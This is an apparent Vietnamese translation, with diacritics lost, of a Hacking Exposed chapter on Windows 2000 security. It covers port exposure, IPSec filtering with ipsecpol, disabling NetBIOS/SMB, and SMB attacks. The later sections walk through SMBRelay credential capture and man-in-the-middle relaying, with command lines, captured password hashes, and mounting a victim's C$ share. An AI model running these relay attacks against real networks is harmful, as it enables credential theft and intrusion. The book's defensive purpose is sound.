http://itlab.com.

vn

eb oo ks @

fr

ee 4v n. or g

phn tch chi tit hn v nhng im yu bo mt ca Windows 2000 v cch khc phc bao gm c nhng sn phm IIS, SQL v TermServ mi nht hy ly mt cun Hacking Exposed Windows 2000 (Osborne/McGraw-Hill, 2001). IN DU VT Nh ta tm hiu trong Chng 1, hu ht nhng k tn cng u khi u bng cch c gng khai thc c cng nhiu thng tin cng tt m cha cn thc s ng n my ch mc tiu. Ngun thng tin li du tch chnh l Domain Name System (DNS), y l mt giao thc tiu chun mng Internet nhm khp a ch IP my ch vi nhng tn d nh nh www.hackingexposed.com

Nhng chuyn giao vng DNS

Tnh ph thng Tnh n gin 9 Tnh hiu qu 2 Mc ri ro 5 5

Do du cch Windows 2000 Active Directory da trn DNS, Microsoft va mi nng cp xong tnh nng thc thi my ch DNS ca Windows 200 nhm p ng nhng nhu cu ca AD v ngc li. Do vy y l mt ngun thng tin du tch tuyt vi, qu khng sai, n mc nh cung cp nhng chuyn i vng cho bt k mt my ch t xa no. Xem Chng 3 bit thm chi tit.

V hiu ha cc chuyn i vng

Tht may mn, tnh nng thc thi DNS trong Windows 2000 cng cho php hn ch chuyn i vng, cng cp trong Chng 3. QUT Windows 2000 nghe trn ma trn ca cc cng, rt nhiu trong s ra i sau NT4. Bng 6-1 lit k nhng cng c la chn nghe trn mt bng iu khin vng (DC) mc nh ca Windows 2000. Mi dch v ny l mt im tt xm nhp vo h thng.

http://itlab.com.vn

Cng Dch v TCP 25 SMTP TCP 21 FTP TCP/UDP 53 DNS TCP 80 WWW TCP/UDP 88 Kerberos TCP 135 RPC/DCE Endpoint mapper UDP 137 NetBIOS Name Service UDP138 NetBIOS Datagram Service TCP 139 NetBIOS Session Service TCP/UDP 389 LDAP TCP 443 HTTP over SSL/TLS TCP/UDP 445 Microsoft SMB/CIFS TCP/UDP 464 Kerberos kpasswd UDP 500 Internet Key Exchange, IKE (IPSec) TCP 593 HTTP RPC Endpoint mapper TCP 636 LDAP over SSL/TLS TCP 3268 AD Global Catalog TCP 3269 AD Global Catalog over SSL TCP 3389 Windows Terminal Server Bng 6-1: Cc cng nghe c la chn trn mt Bng iu khin vng ca Windows 2000 (Ci t mc nh)
LI KHUYN Mt danh sch s ca cng TCP v UDP m cc dch v Microsoft s dng c trn B ti nguyn Windows 2000 (Resource Kit). Tm kim ti a ch http:// www.microsoft.com/Windows2000/techinfo/reskit/samplechapters/default.asp.

nhng bin php i ph: V hiu ha cc dch v v kha cc cng Cch tt nht chn ng cuc tn cng di mi hnh thc l kha ng tip cn nhng dch v ny, cp mng hoc my ch. Cc cng c kim sot ng truy nhp mng ngoai vi (nhng chuyn i, cu dn, firewall, ..v.v) cn phi c nh cu hnh nhm t chi mi n lc kt ni vi tt c cc cng c lit k y vn khng th tt. (Thng thng, phng php in hnh l t chi mi giao thc ti cc my ch v sau kch hot c chn lc nhng dch v m my ch yu cu.) c bit, trn mt bng iu khin vng, khng c cng no l c th truy nhp bn ngoi ngoi vi mng, v ch c mt s rt t l c th tip cn mng cp di ni b ng tin cy. Sau y l hai l do: Trong Chng 3, chung ta bit cch nhng ngi s dng kt ni vi LDAP (TCP 389) v cc cng Global Catalog v m d liu my ch. NetBIOS Session Service, cng TCP 139 cng c gii thiu trong Chng 3 l mt trong nhng ngun d g thng tin ln nht v s ph hng

http://itlab.com.vn

tim tng trn NT. Hu ht cc sn phm chng ti gii thiu trong Chng 5 hot ng duy nht trn cc kt ni NetBIOS. D liu Windows 2000 cng c th c m theo cch tng t trn TCP 445. Ch : Bn cng cn phi c phn V hiu ha NetBIOS/SMB trn Windows 2000, cui Chng ny. Bo v cc cng nghe trn chnh cc my ch c c nhn cng l mt bin php tt. Bo v kin c s lm cho cc bc tn cng s kh khn thm nhiu. Mt li khuyn by lu v kha cnh ny l ng tt c cc dch v khng cn thit bng cch chy services.com v v hiu ha cc dch v khng cn thit. Cn c bit cnh gic vi cc bng iu khin vng Windows 2000. Nu nh mt My ch hoc mt My ch cao cp c tng cp thnh bng iu khin s dng dcpromo.exe, tip Active Directory, DNS, v mt my ch DHCP c ci t, m ra cc cng ph. DC chnh l cc thit b quan trong nht ca mng v c trin khai mt cch trn lc. S dng mt bng iu khin lm nn cho cc ng dng v file, cc dch v printer. S ti thiu ha lun l nguyn tc bo mt u tin. Nhm hn ch tip cn cc cng v phn my ch, ch d phng c in, TCP/IP Filters vn xut hin trong Network v Dial-up connections | Properties of the appropriate connection | Internet Protocol (TCP/IP) Properties | Advanced | Options tab | TCP | IP filtering properties. Tuy nhin nhng nhc im c hu vn cn tn ti. Tnh nng trch lc TCP/IP gn vo tt c cc b iu hp. N s ng hng vo ca mt kt ni hng ra hp l (ngn chn trnh duyt web t h thng), v tnh nng ny yu cu khi ng li h thng trc khi pht huy tc dng. Cnh bo: Nhng th nghim ca chng ti trn Windows 2000 cho thy tnh nng trch lc ca TCP/IP khng kha cc yu cu bo li ICMP (Giao thc 1) ngay c khi IP Giao thc 6 (TCP) 17 (UDP) l nhng i tng duy nht c phpB lc IPSec

http://itlab.com.vn

Mt gii php tt hn l s dng cc b lc IPSec lc cng da trn my ch. Nhng nhng b lc ny l mt li ch ph ca tnh nng h tr mi ca Windows 2000 cho IPSec v c nhm thit k Windows2000test.com v cc mng Openhack s dng vi hiu qu cao. IPSec lc cc gi tin qu trnh ngay trong ngn mng v li loi b nhng gi tin nhn c trn giao din nu nh nhng gi tin ny khng p ng nhng c tnh ca b lc. Tri vi nhng b lc TCP/IP, b lc IPSec c th c ng dng vo cc giao din c nhn, v n s kha hon ton ICMP (mc du cc b lc ny khng kha cc kiu ph ICMP nh bo hiu li (echo), hi m li (echo reply), du hiu thi gian (timestamp)) Cc b lc IPSec khng i hi phi khi ng li h thng (mc du nhng thay i i vi cc b lc s ngng cc kt ni IPSec hin thi). Cc b lc ny ch yu l gii php cho my ch m thi, khng phi l th thut firewall c nhn cho cc trm cng tc bi chng s kha hng vo ca cc kt ni hng ra hp l (tr phi c php qua tt c cc cng), cng tng t nh cc b lc TCP/IP. Bn c th to ra cc b lc IPSec bng cch s dng trnh ng dng Administrative Tools | Local Security Policy (secpol.msc). Trong GUI, nhp chut phi vo nt IPSec Policies On Local Machine ca bn tri, v sau chn Manage IP Filter Lists And Filter Actions.

Chng ta nn s dng tin ch dng lnh ipsecpol.exe qun l cc b lc IPSec. Tin ch ny to thun li cho qu trnh scripting, v n d s dng hn tin ch qun l chnh sch IPSec bng hnh nh rc ri v a dng. Ipsecpol.exe c gii thiu qua Windows 2000 Resource Kit v bng cng c nh cu hnh Bo mt my ch Internet Windows 2000 ti a ch http://www.microsoft.com/technet/security/tools.asp. Nhng dng lnh sau ch cho php cng 80 l c tip cn trn mt my ch: ipsecpol \\ computername -w REG -p Web -o ipsecpol \\ computername -x -w REG -p Web -r BlockAll -n BLOCK f 0+* ipsecpol \\ computername -x -w REG -p Web -r OkHTTP -n PASS f 0:80+*:: TCP Hai dng lnh cui cng to ra mt chnh sch IPSec c tn Web cha ng hai nguyn tc b lc, mt c tn BlockAll c tnh nng kha tt c cc giao thc n v i t my ch ny v tt c cc my ch khc. Nguyn tc cn li c tn OkHTTP cho php cc lung thng tin trn cng 80 n v i t my ch ny v cc my ch khc. Nu bn mun kch hot ping hoc ICMP (chng ti khuyn bn khng nn thc hin tr phi iu l thc s cn thit), bn c th nhp thm nguyn tc ny vo chnh sch Web. Ipsecpol \\ computername -x -w REG -p Web -r OkICMP -n PASS -f 0+*: ICMP V d ny ra chnh sch cho tt c cc a ch, tuy vy bn cng c th d dng xc nh mt a ch IP n s dng kha chuyn i f nhm tp trung cc hiu ng vo mt giao din. Nhng thao tc qut cng ngn chn mt h thng c nh cu hnh c s dng v d trn ch hin th cng 80 m

http://itlab.com.vn

thi.Khi m chnh sch b mt hiu lc th tt c cc cng li d dng b truy nhp. Phn m t ca mi i s trong v d ny c minh ha trong Bng 6-2. ( c phn m t y tnh nng ipsecpol, chy ipsecpol -?, bng 6-2 cng da trn ) Phn m t Lp ipsecpol ch tnh, gip vit chnh sch cho mt im cha nh sn (ngc vi ch ng mc nh, vn pht huy tc dng khi m dch v Policy Agent ang hot ng; do rootkit tiu dit ch ny). Tham s REG quy nh chnh sch phi c vit cho Registry v phi ph hp cho cc my cho cc my ch khng kt ni. (S la chn khc, DS, vit cho th mc). -p Xc nh mt ci tn mang tnh v on (Web, nh trong v d) cho chnh sch ny. Nu nh chnh sch c sn tn ny, nguyn tc ny s c b xung vo chnh sch. V d, nguyn tc OkHTTP c b xung vo chnh sch Web dng th 3. -r Xc nh mt ci tn mang tnh v on cho nguyn tc ny, n s thay i cc nguyn tc hin thi bng cng mt ci tn trong chnh sch. -n Khi ch tnh, la chn NegotiationPolicyList c th xc nh 3 mc c bit: BLOCK, PASS, v INPASS (nh m t trong phn sau ca bng ny) BLOCK B qua phn cn li ca cc chnh sch trong NegotiationPolicyList VAF lm cho tt c cc b lc kha hoc b tt cc b lc. Thao tc cng ging nh la chn mt nt Block radio trong UI qun l IPSec. PASS B qua phn cn li ca cc chnh sch trong NegotiationPolicyList v lm cho tt c cc b lc m. Thao tc cng ging nh la chn mt nt Permit radio trong UI. INPASS Phn ny cng ging nh kim tra Allow Unsecured Communication, hp kim tra But Always Respond Using IPSEC trong UI. -f FilterList Nu nh FilterList l mt hoc nhiu nguyn tc b lc c phn tch bng du cch c tn filterspecs :A.B.C.D/ mask: port =A.B.C.D/mask:port: IP Protocol, nu a ch Ngun lun bn tri =, v a ch ch lun bn phi. Nu bn thay th = bng mt +, 2 b lc phn i s -w REG

http://itlab.com.vn

-x

-y -o

chiu s c to ra, mi b theo hng khc nhau. B phn lc v cng l ty chn. Nu nh chng b loi b, cng Bt k v b phn lc 255.255.255.255 s c s dng. Bn c th thay th b phn lc A.B.C.D bng nhng hnh thc sau: 0 th hin a ch h thng cc b * th hin a ch bt k Tn A DNS (ch : b qua cc a gii php). Giao thc IP (v d, ICMP) l ty chn, nu b b st, th cng Any c chp nhn. Nu bn ch ra mt giao thc th mt cng phi ng ngay trc , hoc :: phi ng trc . (TY CHN) Thit lp chnh sch hat ng trong vng ng k LOCAL. (ch rng chng ta s dng i s ny khi xc nh nguyn tc u tin nhm kch hot chnh sch Web; kha chuyn i ny dng nh ch hat ng nu c ng dng khi to ra b lc u tin ca mt chnh sch.) (TY CHN) Thit lp cc chnh sch khng hat ng trong vng ng k LOCAL. (TY CHN) s xa i chnh sch m s -q quy nh. (Ch : i s ny s xa ton b chnh sch xc nh, khng nn s dng i s ny nu nh bn c cc chnh sch khc hng vo cc i tng trong chnh sch .)

Bng 6-2: Cc tham s ipsecpol s dng lc lung thng tin n mt My ch Windows 2000 Chng ta cn ch rng cc b lc IPSec mc nh s khng kha lung thng tin , thngbo, thng tin QoSRSVP, cng Internet Key Exchange (IKE) 500, hoc cng Kerberos 88 (TCP/UDP) (xem trn a ch http://support.microsoft.com/support/kb/articles/Q253/1/69.asp bit thm thng tin chi tit v nhng dch v ny v chng lin quan n IPSec trong Win 2000). Service Pack 1 trong thit lp Registry vn gip bn v hiu ha cc cng Kerberos bng cch tt nguyn tc min b phn iu khin IPSec. HKLM\SYSTEM\CurrentControlSet\Services\IPSEC\NoDefaultExempt Type DWORD Max 1 Min 0 Default 0

http://itlab.com.vn

Ch c IKE, Multicast, v Broadcast l vn c min, v khng b tc ng bi thit lp Registry. Thng tin Kerberos v RSVP khng c mc nh min na nu nh Registry ny l 1. Ch : Cm n Michael Howard v William Dixon thuc Microsoft v nhng li khuyn trn IPSec. Do c php dng lnh mnh, ipsecpol c th qu kiu cch. Trong v d trc , ta thy rng danh sch b lc phn tch t trn xung (gi s rng mi b lc mi c ipsecpol vit ln pha trn ca danh sch). Nu ta ch n gin thay i trt t p dng nhng nguyn tc ny s dng ipsecpol th s dn n vic lc khng y , y l mt vn rt nan gii. Ngoi ra, dng nh cha c mt phng cch no gip xc nh dy cng bng c php filterspec ch hoc ngun. Do , mc du cc b lc IPSec l bc ci tin ng ch cho vic lc cng TCP/IP, ta cn s dng cn thn v nh rng bn ch ng nhng cng cn thit m thi. Tip theo, chng ti s a ra mt s li khuyn thu c t nhng th nghim rng ri ipsecpol. Nu nh bn mun loi b mt chnh sch, i khi bn s dng i s -y s gip v hiu ha cc chnh sch trc hoc sau khi xa chng bng kha chuyn i o. Chng ta tng bit n trng hp ngay c nhng chnh sch b xa vn c tc dng cho n khi n b v hiu ha hon ton. S dng cng c dng lnh ipsecpol hoc GUI duy nht khi tin hnh thay i cc chnh sch. Khi chng ta to lp cc chnh sch s dng ipsecpol v sau hiu chnh chng thng qua GUI, nhng xung t xut hin v li nhng k h ln trong vn bo v. m bo rng bn xa i tt c nhng nguyn tc b lc khng s dng nhm trnh xung t. y l mt khu vc m GUI th hin ht tnh nng m cc b lc hin thi v cc chnh sch. M Chng 3 cho ta thy NT4 thn thin nh th no khi tc ng tch cc nhm pht hin thng tin nh tn i tng s dng, phn dng chung file, Trong chng , chng ta cng bit cch dch v NetBIOS thu thp d liu i vi cc i tng s dng nc danh trn vng trng nguy him. Chng ta cng bit Active Directory l thng tin cho nhng k tn cng cha c xc nh nh th no. Trong phn ny chng ta khng miu t li nhng cuc tn cng na nhng ta cn ch rng Windows 2000 cung cp mt s bin php mi nhm khc phc nhng s c NetBIOS v SMB. Kh nng t hat ng m khng da trn NetBIOS c th l mt trong nhng thay i quan trng nht trong Windows 2000. Nh cp trong Chng 3, NetBIOS trn TCP/IP c th b v hiu ha s dng Cc tnh nng ca Network v Dial-up Connections thch hp | Properties of Internet

http://itlab.com.vn

Protocol (TCP/IP) | Advanced button | WINDS tab | V hiu ha NetBIOS trn TCP/IP. Tuy nhin iu m hu ht mi ngi u b qua l mc du s ph thuc vo truyn ti NetBIOS c th b v hiu ha theo cch ny nhng Windows 2000 vn c th s dngSMB trn TCP (cng 445) nhm phn chia file Windows (xem Bng 6-1) y l mt ci by m Microsoft ci t ln i tng s dng ngy th vn ngh rng v hiu ha NetBIOS trn TCP/IP (thng qua Cc tnh nng kt ni LAN, WINS tab) s khc phc c s c m vng rng: Vn khng phi nh vy. V hiu ha NetBIOS trn TCP/IP ch c tc dng vi TCP 139 m thi, khng c tc dng vi 445. iu ny gn ging nh vic v hiu ha gii quyt c vn vng rng bi v nhng k tn cng trc khi Service Pack 6a ra i khng th kt ni vi cng 445. V chng c th thc hin mi cng vic nh n i tng s dng, chy user2sid/sid2user, nh chng ta m t chi tit trong Chng 3. ng d dng b la bi nhng thay i b mt ca UI! V hiu ha NetBIOS/SMB trn Windows 2000 May mn thay, ta vn c cch v hiu ha c cng 445. Tuy nhin cng ging nh v hiu ha cng 139 trong NT4, cng vic ny i hi phi khai thc su vo nhng kt ni tm c b iu hp. Trc ht bn phi tm kim tab kt ni, mc du c th n c chuyn ti mt v tr no m cha ai bit (mt s di chuyn kh chu trn phn trc UI). Tab kt ni xut hin bng cch m applet Network and Dial-up Connections v la chn Advanced | Advanced Settings | nh minh ha trong hnh sau:

Bng thao tc b chn File And Printer Sharing For Microsoft Networks, nh minh ha trong Bng 6-1, nhng vng rng s b v hiu ha trn cng 139 v 445 (cng vi file v printer sharing). Khng cn phi khi ng li h thng. (Microsoft xng ng vi nhng li tn dng v cui cng cng cho php nhiu thay i mng m khng cn phi thao tc khi ng li). Hin y vn l cch tt nht nh cu hnh nhng giao din bn ngoi ca mt my ch ni mng Internet. Ch : TCP 139 s xut hin trong qu trnh qut cng, thm ch sau khi qu trnh ny c thit lp. Tuy vy cng s khng cn cung cp thng tin lin quan n NetBIOS.

http://itlab.com.vn

Bn cn nh rng, cc b lc IPSec c th c s dng nhm hn ch s tip cn NetBIOS hoc SMB.

Bng 6-1: V hiu ha NetBIOS v file SMB/CIFS v chc nng printer sharing (kha cc vng) s dng Network v ca s Dial-up Connections Advanced Settings
RestrictAnonymous v Windows 2000 Chng ta hiu r trong Chng 3 cch thit lp RestrictAnonymous Registry c s dng kha tnh nng m cc thng tin nhy cm thng qua nhng vng rng. Trong Windows 2000, RestrictAnonymous c nh cu hnh theo Security Policy | Local Policies | Security Options

Trong Chng 3 chng ta cng hiu r rng RestrictAnonymous c th b b qua. y l iu hon ton mi i vi Windows 2000, RestrictAnonymous c th c gn vi thit lp cht ch hn c tnh nng kha hon ton cc vng rng. No Access Without Explicit Anonymous Permissions tng ng vi vic t RestrictAnonymous = 2 trong Windows 2000 Registry. t RestrictAnonymous = 2 c th xut hin nhng vn v kt ni Windows. Xem KB article Q246216 ti a ch http://search.support.microsoft.com bit thm thng tin chi tit.
XM NHP Khi nm ngoi tm kim sot Windows 200 tr nn yu t trc tt c cc cuc tn cng t xa nh NT4, chng ta s tm hiu trong phn tip theo.

on mt khu NetBIOS-SMB
Nhng cng c ging nh SMBGGrind gii thiu trong Chng 5 vn hu hiu on cc mt khu dng chung trn cc h thng Windows 2000. Nh chng ta tm hiu, nu nh NetBIOS hoc SMB/CIFS c kch hot v

http://itlab.com.vn

my khch ca k tn cng c th giao tip vi SMB, vic on mt khu vn l mi nguy e da ln nht cho cc h thng Windows 2000. Ch :Nh Luke Leighton ca Samba cp nhiu ln trn http://samba. Org, th ta khng nn nhm ln gia NetBIOS v SMB. NetBIOS l mt truyn dn cn SMB l mt giao thc phn chia file c tnh nng kt ni vi NetBIOS-over-TCP(NBT) kiu tn SERVER_NAME#20, cng ging nh bt k mt my ch ph thng no s kt ni vi mt cng TCP. SMB c kt ni vi TCP445 l hon ton tch bit v khng lin quan g ti NetBIOS.
Nghe trm cc thng tin phn tch mt khu (Password Hashes)

Tin ch nm gi gi tin L0phtcrack SMB c gii thiu trong Chng 5 vn c tc dng nm gi v ph nhng thng bo LM c gi i gia nhng i tng s dng cp di (NT4 v Win9x) v my ch Windows 2000. Cu trc ng nhp Kerberos ca Windows 2000 khng d dng b ph bi nhng cuc tn cng nh vy, nhng n c th b ph nu nh mt bng iu khin vng Windows 2000 sn sng ng vai tr l Kerberos KDC. S thi hnh Kerberos ca Windows 2000 cng c thit k nh sau: Qu trnh xc thc s tt xung LM/NTLM nu khng c Kerberos, v vy Windows 2000 s d dng b tn cng vi cu hnh khng kt ni. Ch : Ngay c nhng thnh vin min cng khng s dng Kerberos tip cn cc ti nguyn nu nh cc a ch IP l dng cc tn ch. i hng ng nhp SMB sang K tn cng Nghe trm trn cc thng bo LM tr nn d dng hn nu nh k tn cng c th nh la nn nhn thn tnh thng tin xc thc Windows m k tn cng la chn. Phng php d tin hnh khi m thao tc chuyn i mng c thc hin do n i hi nhng vng SMB st vi h thng ca k tn cng bt chp cu trc lin kt mng. Nhm vo i tng s dng c nhn cng l mt phng php hiu qu. Th thut c bn c gii thiu mt trong nhng sn phm L0phtcrack u tin: gi mt message ti nn nhn bng mt siu lin kt nhng ti mt my ch SMB gi. Nn nhn nhn c message, siu lin kt truy theo sau (th cng hoc t ng), v my khch v tnh gi nhng y quyn SMB ca i tng s dng ln mng. Nhng lin d dng c ngy trang v thng khng i hi nhiu s tng tc vi i tng s dng vi Windows t ng ng nhp nh l mt i tng s dng hin thi nu khng c thm thng tin xc thc no khc. Di gc bo mt th c l y l mt tc ng lm suy yu mnh nht ca Windows. Chng ta s chng minh mt v d v hnh thc tn cng ny trong Chng 16.

http://itlab.com.vn

SMBRelay
Vo thng 5/2001, Ngi Dystic thuc nhm Cult of the Dead Cow tung ra mt cng c c tn SMBRelay (http://pr0n.newhackcity.net/~sd/windoze.html). Thng bo c n tro rm r. T Register khng ngng thi phng cng c ny ln vi tiu Cng c ph tan an ninh WinNT/2K, r rng l h cha nhn thy nhng yu im trong thng tin xc thc LM vn ang nan gii vo thi im . SMBRelay l mt my ch SMB c th thu thp cc thng tin phn tch v i tng s dng v mt khu t lung thng tin SMB i ti. Nh chnh ci tn cho thy th SMBRelay c th ng vai tr khng ch l im cui SMB n cng c th thc hin nhng cuc tn cng vo trung tm trong mt s trng hp c th. Chng ta s tm hiu tnh nng s dng ca SMBRelay nh l mt my ch SMB n gin v tip l tnh nng MITM (tn cng trung tm.

Thu gi thng tin xc thc SMB s dng SMBRelay

Tnh ph thng Tnh n gin 2 Tnh hiu qu 7 Mc ri ro 4 2

Thit lp mt my ch SMBRelay gi tht n gin. Bc u tin l chy cng c SMBRelay bng kha chuyn i lit k xc nh mt giao din vt l thch hp m trn ta c th chy thit b nghe: C:\ > smbrelay /E SMBRelay v0.992 - TCP (NetBT) level SMB man-in-the-middle relay attack Copyright 2001: Sir Dystic, Cult of the Dead Cow Send complaints, ideas and donations to sirdystic@cultdeadcow.com [2] ETHERNET CSMACD - 3Com 10/100 Mini PCI Ethernet Adapter [1] SOFTWARE LOOPBACK - MS TCP Loopback interface Theo nh v d, giao din vi index2 l thch hp nht ta la chn v n l mt bng vt l c th tip cn c t mt h thng t xa. (B iu hp Loopback ch c th tip cn nhng my ch cc b). L d nhin l vi nhiu b iu hp th cc la chn c m rng nhng ta vn ch trng n trng hp n gin nht trong phn ny v s dng b iu hp index2 trong phn tip.

http://itlab.com.vn

Khi chy my ch phi kho lo trn cc h thng Windows 2000 v cc h iu hnh s khng cho php cc qu trnh khc kt ni cng SMB TCP 139 khi m mt h iu hnh ang s dng cng ny. Mt cch khc phc l tm thi v hiu ha cng TCP 139 bng cch kim tra Disable NetBIOS trn TCP/IP, c th l ta la chn Properties of the appropriate Local Area Connection, tip l Properties of Internet Protocol (TCP/IP, nhp vo nt Advanced, v tip chn nt radio thch hp trn WINDS tab, nh trnh by trong Chng 4. Khi thc hin xong, SMBRelay c th kt ni TCP 139. Nu nh v hiu ha TCP 139 khng phi l mt la chn th k tn cng phi to ra mt a ch IP o da vo chy my ch SMB gi. Tht may mn, SMBRelay cung cp tnh nng t ng gip thit lp v xa cc a ch IP o s dng mt kha chuyn i lnh n gin, /L+ ip_ address. Tuy nhin, chng ta thu c nhng kt qu khng thng nht s dng kha chuyn i /L trn Windows 2000 v c l ta nn s v hiu ha TCP 139 nh gii thch trong phn trc thay v s dng /L. Mt chi tit na m ta phi ch khi s dng SMBRelay trn Windows 2000 l: Nu mt my khch SMB Windows 2000 khng th kt ni trn TCP 139, n s tip tc kt ni trn cng TCP 445, nh chng ta tm hiu phn u Chng ny. trnh trng hp my khch Windows 2000 nh la my ch SMBRelay gi nghe trn TCP 139, TCP 445 phi c kha hoc v hiu ha trn my ch gi. V cch duy nht v hiu ha TCP 445 khng nh hng g n TCP 139 nn cch tt nht l kha cng TCP 445 s dng mt b lc IPSec, nh trnh by trong phn trc. V d sau y m t SMBRelay chy trn mt my ch Windows 2000, v gi s rng TCP 139 b v hiu ha v TCP 445 b kha s dng b lc IPSec. Sau y l cch khi chy SMBRelay trn Windows 2000, gi s rng giao din index2 s c s dng cho thit b nghe ni b v a ch chuyn tip, v rng my ch gi s nghe trn a ch IP hin thi ca giao din ny. C:\ >smbrelay /IL 2/ IR 2 SMBRelay v0.992 - TCP (NetBT) level SMB man-in-the-middle relay attack Copyright 2001: Sir Dystic, Cult of the Dead Cow Send complaints, ideas and donations to sirdystic@cultdeadcow.com Using relay adapter index 2: 3Com EtherLink PCI Bound to port 139 on address 192.168.234.34 Tip theo SMBRelay s bt u nhn nhng tha thun vng SMB. Khi mt my khch nn nhn tha thun thnh cng mt vng SMB, sau y trnh t SMBRelay thc hin:

http://itlab.com.vn

Connection from 192.168.234.44: 1526 Request type: Session Request 72 bytes Source name: CAESARS <00> Target name: *SMBSERVER <20> Setting target name to source name and source name to CDC4EVER Response : Positive Session Response 4 bytes Request type: Session Message 137 bytes SMB_COM_NEGOTIATE Response: Session Message 119 bytes Challenge (8 bytes): 952B49767C1D123 Request type: Session Message 298 bytes SMB_COM_SESSION_SETUP_ANDX Password lengths : 24 24 Case insensitive password: 4050C79D024AE0F391DF9A8A5BD5F3AE5E8024C5B9489BF6 Case sensitive password: 544FEA21F6D8E854F4C3B4ADF6A6A5D85F9CEBAB966EEB Username: Administrator Domain: CAESARS-TS OS: Windows 2000 2195 Lanman type: Windows 2000 5.0 ???: Response: Session Message 156 bytes Windows 5.0 Lanman type: Windows 2000 LAN Mangager Domain: CAESARS-TS Password hash written to disk connected? Relay IP address added to interface 2 Bound to port 139 on address 192.1.1.1 relaying for host CAESARS 192.168.234.44 Nh bn c th thy, c passwords LM (khng mang tnh c trng trng hp) v NTLM ( phn bit dng ch) u c kt ni v vit vo tp hashes.txt trong th mc lm vic hin thi. Tp ny c th c truy nhp vo Lophtcrack 2.5x v b tn cng. Ch : Do nh dng tp gia Lophtcrack 3 v Lophtcrack 2.52 khc nhau, ta khng th nhp cc thng tin thu c qua SMBRelay trc tip vo LC3.

http://itlab.com.vn

Nguy him hn, h thng ca gii tin tc hin nay c th xm nhp my khch ch bng vic kt ni n gin qua i ch chuyn tip a ch ny mc nh vi 192.1.1.1. Di y l nhng biu hin ca n: C:\>net use * \\192.1.1.1\c$ Drive E: is now connected to \\192.168.234..252\c$ The command completed successfully. C:\>dir e: Volume in drive G has no label Volume Serial Number is 44FO-BFDD Directory of G:\ 12/02/2000 10:51p <Dir> Documents and settings 12/02/2000 10:08p <Dir> Inetpub 05/25/2001 03:47a <Dir> Program Files 05/25/2001 03:47a <Dir> WINNT 0 File(s) 0 bytes 4 Dir(s) 44,405,624,832, bytes free Trong h thng my khch Windows, h thng kt ni vi my ch SMBRelay trong phn v d trc, chng ta thy nhng biu hin sau. Trc ht, lnh s dng mng gc dng nh c li h thng 64. S dng mng hin thi s bo a cha c ci t. Tuy nhin, phn mng hin thi s pht hin ra rng n c kt ni khng ch nh vi mt my c tn gi mo (CDC4EVER, my c SMBRelay c ci t nh s mc nh tr khi thay i thng s /S name ang s dng. C:\client>net use \\192.168.234.34\ipc$ * /u: Administrator Type the password for \\192.168.234.34\ipc$ System error 64 has occurred. The specified network name is no longer available. C:\client>net use New connection will not be remember. There are no entries in the list C: \client>net session Computer User name Client Type Opens Idle time ---------------------------------------------------------------------------------------------\\CDC4EVER ADMINISTRATOR Owned by cDc 0 00: 00: 27 The command completed successfully.

http://itlab.com.vn

Khi s dng SMBRelay thng pht sinh mt s vn . Mt ln th kt ni t mt a ch IP ca nn nhn cho v khng thnh cng, tt c cc ln th khc t a ch u pht sinh li . (li ny l do thit k chng trnh, nh nu trong mc hng dn). Bn cng c th gp kh khn ny ngay c khi s iu chnh ban u thnh cng nhng bn nhn c mt thng tin nh: Login failure code: 0xC000006D. Khi ng li SMBRelay gim bt nhng kh khn . (ch cn kch phm CTRL-C dng li). Ngoi ra, bn cng c th thy s kt ni sai t b phn iu hp Loopback (169.254.9.119) chng ta yn tm l i. Chng ta cng c th s dng ARP chuyn giao/cache c hi chuyn giao kh nng ti my khch n mt my ch SMB gi to. Xem chng 10 Bin php i ph i hng SMB Trn l thuyt, SMGRelay rt kh bo v. V n i hi kh nng hiu chnh tt c cc xc nhn cc ngn ng LM/NTLM khc nhau, n nn c kh nng bt gi li bt c s xc nhn no trc tip v pha n. Du hiu k thut s thng bo truyn thng SMB c th c s dng trng li cc v tn cng my trung gian SMBRelay, nhng n s khng lm o ln cc v tn cng my ch bt hp php do SMBRelay c th nh gi thp s hiu chnh knh an ninh vi nhng my khch l nn nhn. Cc v tn cng my trung gian SMB (MITM) Tnh ph bin: 2 Tnh n gin: 2 Tnh hiu qu: 8 Mc ri ro: 4 Cc v tn cng my trung gian SMBRelay l l do chnh cho s tuyn truyn ln v my SMBRelay khi n c tung ra thi trng. Mc d khi nim v cc v tn cng SMB MITM l hon ton li thi trong khong thi gian SMBRelay c gii thot, y l cng c ph bin rng ri u tin t ng trng li tn cng. Mt v d v vic b tr my MITM vi SMBRelay c trnh by trong biu 6-2. Trong v d , gii tin tc b tr mt my ch bt hp php 192.168.234.251 (vi NetBIOS trn TCP mt kh nng hot ng, y l a ch thc ca my MITM ca gii tin tc), mt a ch chuyn tip ca 192.168.234.252 s dng /R, v mt a ch my ch ch c /T

http://itlab.com.vn

Bng 6-2: M hnh SMBRelay MITM C:\>smbrelay /IL 2 /IR 2 /R 192.168.234.152 /T 192.168.234.34 Bound to port 139 on address 192.168.234.251 Tip mt my khch b tn cng 192.168.234.220 kt ni vi a ch my ch mo danh, lun thc rng mnh ang giao tip vi mc tiu. Connection from 192.168.234.220:1043 Request type: session request 72 bytes Source name:* GW2KNT4 (00) Target name: SMBSERVER (20) Setting target name to source name and source name to CDC4EVER Response: positive session response 4 bytes Request type: session message 174 bytes SMB_COM_NEGOTIATE Response: session message 95 bytes Challenge (8 bytes): 1DEDB6BF7973DD06 Security signatures required by server*** This may not work Disabling security signatures Ch rng my ch ch c cu hnh s i hi hnh thc truyn thng SMB c ng k s, v SMBRelay s v hiu ha cc ch k. Request type: session Message 286 bytes SMB_COM_SESSION_SETUP_ANDX Password lengths: 24 24 Case insensitive password: A4DA35F982CBE17FA2BBB952CBC01382C210FF29461A71F1 Case sensitive password: F0C2D1CA8895BD26C7C7E8CAA54E10F1E1203DAD4782FB95 Username: Administrator Domain: NT4DOM Os: Windows NT 1381

http://itlab.com.vn

